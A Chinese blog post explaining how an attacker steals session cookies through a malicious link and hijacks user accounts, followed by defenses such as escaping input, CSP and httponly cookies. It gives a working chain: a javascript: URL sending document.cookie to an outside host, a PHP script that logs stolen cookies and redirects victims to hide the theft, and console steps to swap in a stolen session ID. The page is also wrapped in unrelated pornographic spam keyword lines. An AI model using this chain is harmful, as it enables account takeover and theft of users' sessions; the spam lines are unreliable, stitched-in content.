<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      簡析小黑是如何盜取cookie登錄用戶賬號

      都說cookie不安全,現在通過一個很簡單的例子來說明它為什么不安全。

      對于cookie的概念這里就不做闡述了。前端截取cookie的方式有多種,下面介紹一種比較簡單的手法。

      首先:

      小黑會在各種網站發布帖子,然后在某些特定的地方添加吸引人點擊的內容,而該內容會有一些超鏈接。比如在A網站,小黑在發布的內容中加個超鏈接:

      <a href=”JS_URL”  target=”_blank”>點擊我,跳轉到B網站</a>

      然后JS_URL 用如下形式:

      javascript:window.location.+document.cookie;

      或者

      javascript:window.open('http://www.getcookie.com/info.php?usercookie='+document.cookie);

       

      然后:

      小黑在自己的服務器上也就是www.getcookie.com 上寫好腳本info.php,接收以上超鏈接傳輸過來的cookie。

      Info.php

      <?php

      $info=$_GET[‘usercookie’];

      if($info){

          file_put_contents('./cookie_log.txt', $info.PHP_EOL, FILE_APPEND);

      }

      header("Location:http://www.B.com");//因為超鏈接是要跳轉到B網站,拿到cookie后再給他跳轉,不容易被發現。

       

      最后:

      小黑拿到其他用戶的cookie后,在A網站登錄自己的賬號,然后只需要將自己賬號的cookie改成前面截取到的cookie。具體步驟:

      進入F12的控制臺,執行:document.cookie = 'PHPSESSID= aaaaaaaaaaaa;'; 有的網站有多個cookie,每個cookie會對應不同子域名,所有這種需要在設置cookie時加上有效的域名和目錄等。比如:document.cookie = PHPSESSID =aaaaaaaaaaaa;'+ 'path=/;'+ 'domain=.A.com';  表示一級域名下有效。

      如果沒有A網站的賬號,也可以直接設置cookie到該網站的域名下,不過這樣可能花費的調試時間多些,因為有些網站有多個cookie,各個cookie對應的子域名、目錄等可能不一樣。如果自己有一個賬號,只要登錄后替換對應鍵的cookie值就可以了。

      除了在控制臺執行document.cookie,也可以Application項目的Cookies欄目下修改cookie值。

      刷新一下,就能獲得別人賬號的權限了。

       

      對于這種XSS攻擊,有時真的是防不勝防,但也還得防。

      防范方式:

      1)字符的過濾,將用戶輸入的字符進行特殊字符過濾或轉義,比如空格,單引號,雙引號,尖括號等;

      2)避免cookie中泄露用戶隱私,也可以通過cookie和ip綁定來降低泄露風險。

      3)提交表單盡量用POST而非GET

      4)內容安全策略——CSP(Content-Security-Policy),一種以可信白名單作機制,來限制網站中是否可以包含某來源內容。默認配置下不允許執行內聯代碼

      5)設置cookie為httponly。這樣前端就無法通過document.cookie截取到該cookie值。比如php的設置方法:

      方法一、在php.ini配置文件中進行cookie只讀設置的開啟 :session.cookie_httponly = On

      方法二、在php代碼頂部設置
      <?php
      ini_set("session.cookie_httponly", 1);
      //php5.1以前版本設置方法:header("Set-Cookie: hidden=value; httpOnly");
      ?>

       

      posted @ 2020-05-21 17:17  喜歡哲學的猴子  閱讀(1003)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 国产亚洲亚洲国产一二区| 亚洲精品成人无限看| 欧洲中文字幕一区二区| 久久中文字幕一区二区| 色一伦一情一区二区三区| 久久精品网站免费观看| 日韩有码中文在线观看| 九九热视频在线精品18| 人人澡人人妻人人爽人人蜜桃 | 欧美老少配性行为| 中文字幕无码不卡免费视频| 精品久久久久久无码不卡| 亚洲欧洲美洲在线观看| 国产专区一线二线三线码| 亚洲高清激情一区二区三区 | 国产午夜精品理论大片| 九九热视频免费在线播放| 色香欲天天影视综合网| 日韩午夜福利片段在线观看| 国产精品久久久久孕妇| 成人3D动漫一区二区三区| www国产精品内射熟女| 精品无人区卡一卡二卡三乱码| 精选国产av精选一区二区三区 | 99久久国产综合精品成人影院| 免费观看的av在线播放| 天堂va蜜桃一区二区三区| 国产成人精品亚洲日本片| 狠狠综合久久综合88亚洲| 99久久久无码国产精品免费| 黑人精品一区二区三区不| 色伊人久久综合中文字幕| 国产精品大片中文字幕| 亚洲中文字幕国产综合| 久久亚洲精品中文字幕波多野结衣 | 亚洲码欧洲码一二三四五| 日韩欧美一卡2卡3卡4卡无卡免费2020 | 果冻传媒一区二区天美传媒| 少妇无码av无码一区| 国内自拍视频在线一区| 白银市|